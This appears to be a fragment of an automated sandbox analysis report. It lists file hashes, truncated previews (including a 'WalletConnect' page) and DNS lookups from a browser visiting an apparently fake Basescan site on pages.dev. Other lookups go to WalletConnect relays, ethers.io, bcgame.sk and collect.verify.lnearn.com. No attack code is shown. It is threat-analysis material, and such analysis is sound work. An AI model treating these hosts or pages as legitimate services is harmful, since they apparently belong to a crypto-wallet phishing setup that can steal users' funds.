                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2442
                                                                                                                                                                                                                                              Entropy (8bit):4.544807286103697
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:IysvcXFFFriRD/sRmeKhK/ghE/ieWmaJX6pdUPF8:q8RKoW2WBJXLPF8
                                                                                                                                                                                                                                              MD5:645D485B7082F5FF248B9B75CD298974
                                                                                                                                                                                                                                              SHA1:1565FAB9E8010B62E033C9793710E11D32462BB7
                                                                                                                                                                                                                                              SHA-256:0D0FAE37857DBD9365F9BCF6A599EE955F8308B5261F26BFA8DF747A62FDA4A0
                                                                                                                                                                                                                                              SHA-512:B3D1A98C3CFD70243EFF159F89FE64D2DDE18F35A698162A657950B5052D525DE78854831764E204E36B72E4FF15D5458B51D98517A36FE0E9A60FF1D26AED90
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <title>404 - Page Not Found</title>. <link. href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;800&display=swap". rel="stylesheet". />. <style>. * {. margin: 0;. padding: 0;. box-sizing: border-box;. }.. body {. font-family: "Poppins", sans-serif;. background-color: #c7fc3a;. color: #000; /* Updated text color to black */. display: flex;. align-items: center;. justify-content: center;. min-height: 100vh;. margin: 0;. }.. .container {. width: 100%;. max-width: 800px;. text-align: center;. padding: 1rem;. }.. .error-code {. font-size: 8rem;. font-weight: 800;. margin-bottom: 1rem;. }.. .error-message {. font-size: 1.5rem;.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5860)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):5861
                                                                                                                                                                                                                                              Entropy (8bit):5.440993735176134
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:6TV0GjhEzRIwp+5dWdcfpEI84kvv6sQ5HHfqHX+SnzEvi46aNW9tt494jy37xrs:6TV0GjhaRhYpEI84kKsQVqHX+SnEzwPT
                                                                                                                                                                                                                                              MD5:D9A4FA1B8614AC459B5363C6B4141161
                                                                                                                                                                                                                                              SHA1:D01FCF983FC66496DF89C7E0E631EFF953751C2A
                                                                                                                                                                                                                                              SHA-256:62977C41114ECA815DCF72C9B9176737D9E1404B9B42E2D6995B03EAF20E8E32
                                                                                                                                                                                                                                              SHA-512:87D8698AECB55948097A0173B58B360C4C3D78CFF29C45E0C4EEF7BB1CAA7AB12CFBAA48E6063BF67BF6BEE5B586FE7B025B9654EF1940874D5373E59E4AA331
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/UpcomingDrawSection-87ed187d.js
                                                                                                                                                                                                                                              Preview:var G=Object.defineProperty,H=Object.defineProperties;var W=Object.getOwnPropertyDescriptors;var T=Object.getOwnPropertySymbols;var J=Object.prototype.hasOwnProperty,K=Object.prototype.propertyIsEnumerable;var D=(e,r,a)=>r in e?G(e,r,{enumerable:!0,configurable:!0,writable:!0,value:a}):e[r]=a,w=(e,r)=>{for(var a in r||(r={}))J.call(r,a)&&D(e,a,r[a]);if(T)for(var a of T(r))K.call(r,a)&&D(e,a,r[a]);return e},$=(e,r)=>H(e,W(r));var E=(e,r,a)=>new Promise((s,m)=>{var u=i=>{try{g(a.next(i))}catch(t){m(t)}},b=i=>{try{g(a.throw(i))}catch(t){m(t)}},g=i=>i.done?s(i.value):Promise.resolve(i.value).then(u,b);g((a=a.apply(e,r)).next())});import{b as Q,g as X,c as d,S as R,i as o,a as k,t as h,d as N,q as Y,k as Z,n as ee,h as te,p as ae}from"./solid-js-8ff414d5.js";import{u as ie}from"./currency-47f1b68e.js";import{r as P,c as S}from"./index-1cecafc8.js";import{c as re}from"./CountryAvatar-04e11269.js";import{e as f,g as le,h as ne,M as se,u as oe,c as ce,y as de,i as z,B as me,d as ge,s as ue}fro
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9416
                                                                                                                                                                                                                                              Entropy (8bit):7.964081724766044
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:sOVr95ti593Dm9F5rjEEeWfqBLR2d11wMpjLV99dtahyN:sOJ95Y9AbrjEEeWSBLY9wmLV99dtFN
                                                                                                                                                                                                                                              MD5:703CDD55C9374400B68EA9D77916BF85
                                                                                                                                                                                                                                              SHA1:8BDBFEAE999E7D5F16596FBB9DE902F031C028D7
                                                                                                                                                                                                                                              SHA-256:45F2E2C140544AF8109D46A7C77B9009D49580F6FCAE098189CF41F997651B60
                                                                                                                                                                                                                                              SHA-512:8D555760F391A795BA7849B6D0B4F30E0464B734C4646001860CDA58610B2DD561B7383918783AB96A7BF0E9C2278C2DF202B41B048B4749E320EBA13C9FF285
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d........."..$....sRGB....... .IDATx^.......E...l.zV..+.'>..[........8..A......|-....%.X.K.^}~..9..<....5..8..?K.X...4..yz..+...VM.0b..iG{..}.1....>....u...u...}..?..{..\G._.?X...{..`........v~!5..wx.1...{.c...on..........i..s.:.o...S.\.q.:@.X.y.q.0.y....[_.,.....[.!.S}5.........j_QSX'9...u.f.....k.....=......qc...?.c..N.....)%...>..x&....z.:..Z...c..(.....emg$...p!zH.0b...QIL.,.Z...WI.^..G.0I.Fc...*.......L.......-..xV+.H.!..GJ....\...q.Wj6.....&1Zn{.Vt._.:5..I.1..*...TS.....|....BG u.....k]..........^bDd.b.....M...XE%./..vAu:.y....:........*..&X......gE..W.A.g.4.....l.+.Y'6y.>..Z-.wA.3.~2Q..!...lnUY.A...y.M....."Y .Z.....4....S.{...........a. ..)..G.7L.v.....+..H=..S..u"....Y.}K\.....o.K...-C\.....I...^.I.GrfTs..k......3.$...ah^..Q."..;.)r.^.]..R.....*x.7....l.........yP.j.vS.+.|.d...$bo*ji[..0...5...8*@..E...:~..+..k..<..!.....Xw.U..BO...A.M@-.:....%...>..x.IG...A....E.W4_..]+.d.`.sF{.S..Hb.....-~.q.'...F..tLL
                                                                                                                                                                                                                                              No static file info
                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.146260977 CEST192.168.2.51.1.1.10x234aStandard query (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.146410942 CEST192.168.2.51.1.1.10xb4beStandard query (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.160789967 CEST192.168.2.51.1.1.10xec27Standard query (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.160927057 CEST192.168.2.51.1.1.10x1623Standard query (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:53.427634954 CEST192.168.2.51.1.1.10x905fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:53.428122044 CEST192.168.2.51.1.1.10x1ca2Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:54.411298990 CEST192.168.2.51.1.1.10x9c3Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:54.411818981 CEST192.168.2.51.1.1.10x6279Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:55.052797079 CEST192.168.2.51.1.1.10x12beStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:55.053658962 CEST192.168.2.51.1.1.10xdc89Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:56.721250057 CEST192.168.2.51.1.1.10xda7bStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:56.721879959 CEST192.168.2.51.1.1.10x652dStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.466593981 CEST192.168.2.51.1.1.10x2b6fStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.466703892 CEST192.168.2.51.1.1.10x84d6Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.749679089 CEST192.168.2.51.1.1.10x22a2Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.750057936 CEST192.168.2.51.1.1.10xa038Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.800859928 CEST192.168.2.51.1.1.10x6fcdStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:00.040946007 CEST192.168.2.51.1.1.10xfb77Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:00.041420937 CEST192.168.2.51.1.1.10xffaStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:00.046542883 CEST192.168.2.51.1.1.10x4637Standard query (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:00.046758890 CEST192.168.2.51.1.1.10x2d4fStandard query (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:01.139273882 CEST192.168.2.51.1.1.10x12feStandard query (0)basescan.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:01.139343977 CEST192.168.2.51.1.1.10xfd8fStandard query (0)basescan.org65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:02.855166912 CEST192.168.2.51.1.1.10x6041Standard query (0)www.walletlink.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:02.855927944 CEST192.168.2.51.1.1.10xf811Standard query (0)www.walletlink.org65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:02.860496998 CEST192.168.2.51.1.1.10x6895Standard query (0)api.web3modal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:02.861872911 CEST192.168.2.51.1.1.10xf889Standard query (0)api.web3modal.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.211220026 CEST192.168.2.51.1.1.10x5baStandard query (0)relay.walletconnect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.211220026 CEST192.168.2.51.1.1.10x1ad5Standard query (0)relay.walletconnect.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.463357925 CEST192.168.2.51.1.1.10x3f76Standard query (0)eas.etherscan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.463561058 CEST192.168.2.51.1.1.10xdff2Standard query (0)eas.etherscan.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.465903044 CEST192.168.2.51.1.1.10x1f05Standard query (0)api.hypelab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.466331005 CEST192.168.2.51.1.1.10x338aStandard query (0)api.hypelab.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.387320995 CEST192.168.2.51.1.1.10x6371Standard query (0)basescan.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.387793064 CEST192.168.2.51.1.1.10xfe4aStandard query (0)basescan.org65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.549443007 CEST192.168.2.51.1.1.10xe1bcStandard query (0)relay.walletconnect.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.550127983 CEST192.168.2.51.1.1.10x4c94Standard query (0)relay.walletconnect.org65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.387953997 CEST192.168.2.51.1.1.10x22aaStandard query (0)api.web3modal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.388123989 CEST192.168.2.51.1.1.10xbbf0Standard query (0)api.web3modal.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.389133930 CEST192.168.2.51.1.1.10x815eStandard query (0)d107ul3j3wrui0.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.390131950 CEST192.168.2.51.1.1.10x5f70Standard query (0)d107ul3j3wrui0.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:08.225771904 CEST192.168.2.51.1.1.10xde5dStandard query (0)eas.etherscan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:08.225974083 CEST192.168.2.51.1.1.10xffd3Standard query (0)eas.etherscan.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:09.265999079 CEST192.168.2.51.1.1.10x2b3bStandard query (0)d107ul3j3wrui0.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:09.266438007 CEST192.168.2.51.1.1.10xde04Standard query (0)d107ul3j3wrui0.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:10.906476974 CEST192.168.2.51.1.1.10xf57bStandard query (0)b.ixncdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:10.906476974 CEST192.168.2.51.1.1.10x4df0Standard query (0)b.ixncdn.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:10.919562101 CEST192.168.2.51.1.1.10xd1b5Standard query (0)b.ixncdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:10.943026066 CEST192.168.2.51.1.1.10xcca1Standard query (0)a.ixncdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:10.943363905 CEST192.168.2.51.1.1.10xb7ecStandard query (0)a.ixncdn.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:11.820893049 CEST192.168.2.51.1.1.10x2e0cStandard query (0)c.ixncdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:11.821146965 CEST192.168.2.51.1.1.10x84e8Standard query (0)c.ixncdn.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:11.876152992 CEST192.168.2.51.1.1.10xa8bbStandard query (0)a.ixncdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:11.876534939 CEST192.168.2.51.1.1.10x1a91Standard query (0)a.ixncdn.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:13.449474096 CEST192.168.2.51.1.1.10xc57cStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:13.449982882 CEST192.168.2.51.1.1.10xcf0bStandard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:13.490487099 CEST192.168.2.51.1.1.10xc016Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:14.106576920 CEST192.168.2.51.1.1.10xe06aStandard query (0)c.ixncdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:14.106972933 CEST192.168.2.51.1.1.10xa1daStandard query (0)c.ixncdn.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:16.220915079 CEST192.168.2.51.1.1.10x5e1cStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:16.222022057 CEST192.168.2.51.1.1.10x7249Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:16.322698116 CEST192.168.2.51.1.1.10xb4aaStandard query (0)api.hypelab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:16.323613882 CEST192.168.2.51.1.1.10x168bStandard query (0)api.hypelab.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:18.739672899 CEST192.168.2.51.1.1.10x6271Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:18.739800930 CEST192.168.2.51.1.1.10x51c5Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:18.749217033 CEST192.168.2.51.1.1.10x4648Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:21.367327929 CEST192.168.2.51.1.1.10x7c5fStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:21.367600918 CEST192.168.2.51.1.1.10xb32dStandard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:24.002438068 CEST192.168.2.51.1.1.10xfdc9Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:24.003628969 CEST192.168.2.51.1.1.10xc7a6Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:24.020257950 CEST192.168.2.51.1.1.10x43eeStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:26.600825071 CEST192.168.2.51.1.1.10xd5b1Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:26.601170063 CEST192.168.2.51.1.1.10x2b0aStandard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:28.978017092 CEST192.168.2.51.1.1.10xac0dStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:28.978173018 CEST192.168.2.51.1.1.10x70deStandard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:28.998261929 CEST192.168.2.51.1.1.10x6edaStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:31.519685984 CEST192.168.2.51.1.1.10xbe8Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:31.519967079 CEST192.168.2.51.1.1.10x722fStandard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:34.371284962 CEST192.168.2.51.1.1.10xb632Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:34.371906042 CEST192.168.2.51.1.1.10x7f33Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:34.388675928 CEST192.168.2.51.1.1.10xbaf2Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:37.148310900 CEST192.168.2.51.1.1.10xd456Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:37.148663998 CEST192.168.2.51.1.1.10x41e6Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:39.676532030 CEST192.168.2.51.1.1.10xf150Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:39.676682949 CEST192.168.2.51.1.1.10x7e94Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:39.693578959 CEST192.168.2.51.1.1.10xad5dStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:41.079189062 CEST192.168.2.51.1.1.10x8c8aStandard query (0)goto.etherscan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:41.079586029 CEST192.168.2.51.1.1.10xcd04Standard query (0)goto.etherscan.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:42.488289118 CEST192.168.2.51.1.1.10xa670Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:42.488837004 CEST192.168.2.51.1.1.10xe440Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:42.506899118 CEST192.168.2.51.1.1.10xa9d8Standard query (0)bcgame.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:42.507147074 CEST192.168.2.51.1.1.10x90feStandard query (0)bcgame.sk65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:45.484180927 CEST192.168.2.51.1.1.10x78bStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:45.484391928 CEST192.168.2.51.1.1.10x902Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:45.505528927 CEST192.168.2.51.1.1.10x62a8Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:46.647284985 CEST192.168.2.51.1.1.10x74c2Standard query (0)bcgame.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:46.647440910 CEST192.168.2.51.1.1.10xd8aStandard query (0)bcgame.sk65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.036303043 CEST192.168.2.51.1.1.10x43acStandard query (0)socketv2.bcgame.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.036550045 CEST192.168.2.51.1.1.10x861cStandard query (0)socketv2.bcgame.sk65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.037627935 CEST192.168.2.51.1.1.10x8c67Standard query (0)socket2v2.bcgame.skA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.037797928 CEST192.168.2.51.1.1.10xd58cStandard query (0)socket2v2.bcgame.sk65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.707743883 CEST192.168.2.51.1.1.10x7547Standard query (0)bc.imgix.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:50.708046913 CEST192.168.2.51.1.1.10xe17Standard query (0)bc.imgix.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:53.240348101 CEST192.168.2.51.1.1.10x735bStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:53.240529060 CEST192.168.2.51.1.1.10x634aStandard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:53.337574005 CEST192.168.2.51.1.1.10xadabStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:54.719446898 CEST192.168.2.51.1.1.10x67f0Standard query (0)collect.verify.lnearn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:54.719609022 CEST192.168.2.51.1.1.10xf44fStandard query (0)collect.verify.lnearn.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:55.017767906 CEST192.168.2.51.1.1.10xf610Standard query (0)bc.imgix.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:55.018131971 CEST192.168.2.51.1.1.10xdbb8Standard query (0)bc.imgix.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:58.223597050 CEST192.168.2.51.1.1.10x4a0cStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:58.223732948 CEST192.168.2.51.1.1.10x9865Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:58.241395950 CEST192.168.2.51.1.1.10x6cffStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:00.039413929 CEST192.168.2.51.1.1.10x1f00Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:00.039489031 CEST192.168.2.51.1.1.10xc13Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.641272068 CEST192.168.2.51.1.1.10x9e1eStandard query (0)collect.verify.lnearn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.641433954 CEST192.168.2.51.1.1.10x3196Standard query (0)collect.verify.lnearn.com65IN (0x0001)false
